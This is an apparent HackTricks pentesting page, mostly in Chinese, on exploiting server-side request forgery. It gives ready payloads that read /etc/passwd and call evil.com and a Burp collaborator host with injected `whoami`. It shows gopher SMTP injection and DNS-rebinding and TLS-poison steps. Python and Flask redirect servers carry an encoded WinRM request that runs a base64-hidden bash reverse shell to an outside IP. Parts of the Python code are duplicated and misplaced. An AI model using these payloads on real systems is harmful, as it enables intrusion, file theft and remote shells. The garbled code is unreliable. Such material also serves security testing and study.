hacktricks/pentesting-web/ssrf-server-side-request-forgery/README.md
2023-08-03 19:12:22 +00:00

24 KiB
Raw Blame History

SSRF服务器端请求伪造


使用Trickest可以轻松构建和自动化由全球最先进的社区工具提供支持的工作流程。
立即获取访问权限:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

服务器端请求伪造也称为SSRF是一种Web安全漏洞允许攻击者诱使服务器端应用程序向攻击者选择的任意域发出HTTP请求。来自这里

捕获SSRF

首先您需要捕获由您引发的SSRF交互。您可以使用以下工具来捕获HTTP或DNS交互

绕过白名单域

通常您会发现SSRF仅在某些白名单域或URL中起作用。在下一页中您可以找到尝试绕过白名单的技术汇编

{% content-ref url="url-format-bypass.md" %} url-format-bypass.md {% endcontent-ref %}

通过开放重定向绕过

如果服务器受到正确的保护,您可以通过利用网页内的开放重定向来绕过所有限制。因为网页将允许对同一域进行SSRF,并且可能会跟随重定向,您可以利用开放重定向使服务器访问任何内部资源
在此处阅读更多信息:https://portswigger.net/web-security/ssrf

协议

file://

file:///etc/passwd

dict://

DICT URL方案用于引用使用DICT协议可用的定义或单词列表

dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
ssrf.php?url=dict://attacker:11111/

SFTP://

一种用于通过安全外壳进行安全文件传输的网络协议

ssrf.php?url=sftp://evil.com:11111/

TFTP://

简单文件传输协议通过UDP工作

ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET

LDAP://

轻量级目录访问协议。它是一种应用协议用于在IP网络上管理和访问分布式目录信息服务。

ssrf.php?url=ldap://localhost:11211/%0astats%0aquit

Gopher://

使用此协议,您可以指定要服务器发送IP、端口和字节。然后,您基本上可以利用 SSRF 与任何 TCP 服务器通信(但您需要先了解如何与该服务进行通信)。
幸运的是,您可以使用 Gopherus 为多个服务创建有效载荷。此外,remote-method-guesser 可用于为 Java RMI 服务创建 gopher 有效载荷。

Gopher smtp

ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AHYou didn't say the magic word !
.
QUIT

Gopher HTTP

Gopher is a protocol that allows the retrieval of documents over the Internet. It was popular in the early days of the web but has since been largely replaced by HTTP. However, Gopher is still supported by some servers and can be used for SSRF attacks.

SSRF (Server-Side Request Forgery) is a vulnerability that allows an attacker to make requests from the server to other internal or external resources. By exploiting SSRF, an attacker can potentially access sensitive information, perform port scanning, or even pivot to other systems within the network.

In the context of SSRF, Gopher can be used as a transport protocol to bypass restrictions and access internal resources. The basic idea is to craft a Gopher URL that points to the desired resource and then make a request to the server using this URL.

To perform a Gopher SSRF attack, follow these steps:

  1. Identify the SSRF vulnerability in the target application.
  2. Craft a Gopher URL that points to the desired resource. The URL should follow the format gopher://<attacker-controlled-IP>:<attacker-controlled-port>/.
  3. Send the crafted Gopher URL as a request to the server.
  4. Analyze the response from the server to determine if the attack was successful.

It's important to note that Gopher SSRF attacks may not work in all scenarios, as many servers have disabled or restricted Gopher support. Additionally, the success of the attack depends on the specific implementation of the server and the security measures in place.

To mitigate the risk of Gopher SSRF attacks, it is recommended to:

  • Implement proper input validation and sanitization to prevent SSRF vulnerabilities.
  • Disable or restrict Gopher support on servers that do not require it.
  • Regularly update and patch server software to address any known vulnerabilities.

By understanding the Gopher protocol and its potential for SSRF attacks, you can better protect your applications and systems from exploitation.

#For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body

Gopher SMTP — 反向连接到 1337

{% code title="redirect.php" %}

<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>Now query it.
https://example.com/?q=http://evil.com/redirect.php.

{% endcode %}

SMTP

https://twitter.com/har1sec/status/1182255952055164929

  1. 使用SSRF连接到smtp localhost:25
  2. 从第一行获取内部域名 220 http://blabla.internaldomain.com ESMTP Sendmail
  3. 在github上搜索 http://internaldomain.com ,找到子域名
  4. 连接

Curl URL globbing - WAF绕过

如果SSRF由curl执行curl有一个称为URL globbing的功能可以用于绕过WAF。例如在这个writeup中,你可以找到一个通过file协议进行路径遍历的示例:

file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}

捕获SSRF请求

通过Referrer头实现SSRF

一些应用程序使用服务器端分析软件来跟踪访问者。该软件通常会记录请求中的Referrer头因为这对于跟踪传入链接特别重要。通常分析软件实际上会访问出现在Referrer头中的任何第三方URL。这通常是为了分析引用站点的内容包括传入链接中使用的锚文本。因此Referer头通常代表了SSRF漏洞的有利攻击面。
要发现这种“隐藏”的漏洞您可以使用Burp的插件“Collaborator Everywhere”。

通过证书的SNI数据实现SSRF

最简单的配置错误,允许您连接到任意后端,可能如下所示:

stream {
server {
listen 443;
resolver 127.0.0.11;
proxy_pass $ssl_preread_server_name:443;
ssl_preread on;
}
}

在这里SNI字段的值直接用作后端的地址。

通过这种不安全的配置我们可以通过在SNI字段中指定所需的IP或域名来利用SSRF漏洞。例如以下命令将强制Nginx连接到_internal.host.com_

openssl s_client -connecttarget.com:443 -servername "internal.host.com" -crlf

使用Wget上传文件

SSRF与命令注入

可以尝试使用如下负载:url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`

PDF渲染

如果网页自动创建了一个包含你提供的一些信息的PDF你可以插入一些JS代码这些代码将由PDF创建者服务器在创建PDF时执行从而滥用SSRF。在这里找到更多信息.

从SSRF到DoS

创建多个会话并尝试利用会话中的SSRF下载大文件。

SSRF PHP函数

{% content-ref url="../../network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md" %} php-ssrf.md {% endcontent-ref %}

SSRF重定向到Gopher

对于某些利用,您可能需要发送重定向响应可能使用不同的协议如gopher。这里有不同的Python代码用于响应重定向

# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

class MainHandler(BaseHTTPRequestHandler):
def do_GET(self):
print("GET")
self.send_response(301)

self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
```python
self.end_headers()

httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
httpd.serve_forever()
self.end_headers()

httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
httpd.serve_forever()
from flask import Flask, redirect
from urllib.parse import quote
app = Flask(__name__)

@app.route('/')
def root():
return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)

if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)

使用Trickest可以轻松构建和自动化由全球最先进的社区工具提供支持的工作流程。
立即获取访问权限:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

DNS Rebidding CORS/SOP绕过

如果由于CORS/SOP的限制而无法从本地IP中窃取内容可以使用DNS Rebidding绕过该限制

{% content-ref url="../cors-bypass.md" %} cors-bypass.md {% endcontent-ref %}

自动化DNS Rebidding

Singularity of Origin是一种执行DNS rebinding攻击的工具。它包括重新绑定攻击服务器DNS名称的IP地址到目标机器的IP地址以及提供攻击载荷以利用目标机器上的易受攻击的软件所需的组件。

还可以在http://rebind.it/singularity.html上查看公开运行的服务器****

DNS Rebidding + TLS会话ID/会话票证

要求:

  • SSRF
  • 出站TLS会话
  • 本地端口上的内容

攻击步骤:

  1. 要求用户/机器人访问由攻击者控制的域名
  2. DNSTTL0因此受害者将很快再次检查域名的IP
  3. 在受害者和攻击者域之间创建TLS连接。攻击者在会话ID或会话票证中引入载荷
  4. 域名将对自身发起无限重定向循环。这样做的目的是使用户/机器人访问该域名,直到再次执行域名的DNS请求
  5. 在DNS请求中现在给出了私有IP地址例如127.0.0.1
  6. 用户/机器人将尝试重新建立TLS连接,为此它将发送会话ID/票证ID其中包含了攻击者的载荷)。恭喜,您成功地要求了用户/机器人攻击自己

请注意在此攻击期间如果要攻击localhost:11211memcache您需要使受害者与www.attacker.com:11211端口必须始终相同)建立初始连接。
执行此攻击,可以使用以下工具https://github.com/jmdx/TLS-poison/
有关此攻击的更多信息,请参阅解释此攻击的讲座:https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference

盲SSRF

盲SSRF和非盲SSRF的区别在于在盲SSRF中您无法看到SSRF请求的响应。因此它更难以利用因为您只能利用已知的漏洞。

基于时间的SSRF

通过检查服务器响应的时间,可以确定是否存在某个资源(访问现有资源可能比访问不存在的资源需要更长的时间)

云SSRF利用

如果在云环境中运行的机器中发现了SSRF漏洞您可能能够获取有关云环境甚至凭据的有趣信息

{% content-ref url="cloud-ssrf.md" %} cloud-ssrf.md {% endcontent-ref %}

SSRF易受攻击的平台

一些已知平台包含或曾包含SSRF漏洞请在以下位置检查它们

{% content-ref url="ssrf-vulnerable-platforms.md" %} ssrf-vulnerable-platforms.md {% endcontent-ref %}

工具

SSRFMap

用于检测和利用SSRF漏洞的工具

Gopherus

此工具可为以下内容生成Gopher载荷

  • MySQL
  • PostgreSQL
  • FastCGI
  • Redis
  • Zabbix
  • Memcache

remote-method-guesser

_remote-method-guesser_是一种支持大多数常见_Java RMI_漏洞的攻击操作的_Java RMI_漏洞扫描工具。大多数可用操作都支持--ssrf选项以生成所请求操作的_SSRF_载荷。结合--gopher选项可以直接生成可用的_gopher_载荷。

SSRF Proxy

SSRF Proxy是一个多线程HTTP代理服务器旨在通过对易受Server-Side Request Forgery (SSRF)攻击的HTTP服务器进行隧道传输客户端HTTP流量。

练习

{% embed url="https://github.com/incredibleindishell/SSRF_Vulnerable_Lab" %}

参考资料

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥


使用Trickest轻松构建和自动化工作流程,利用世界上最先进的社区工具。
立即获取访问权限:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}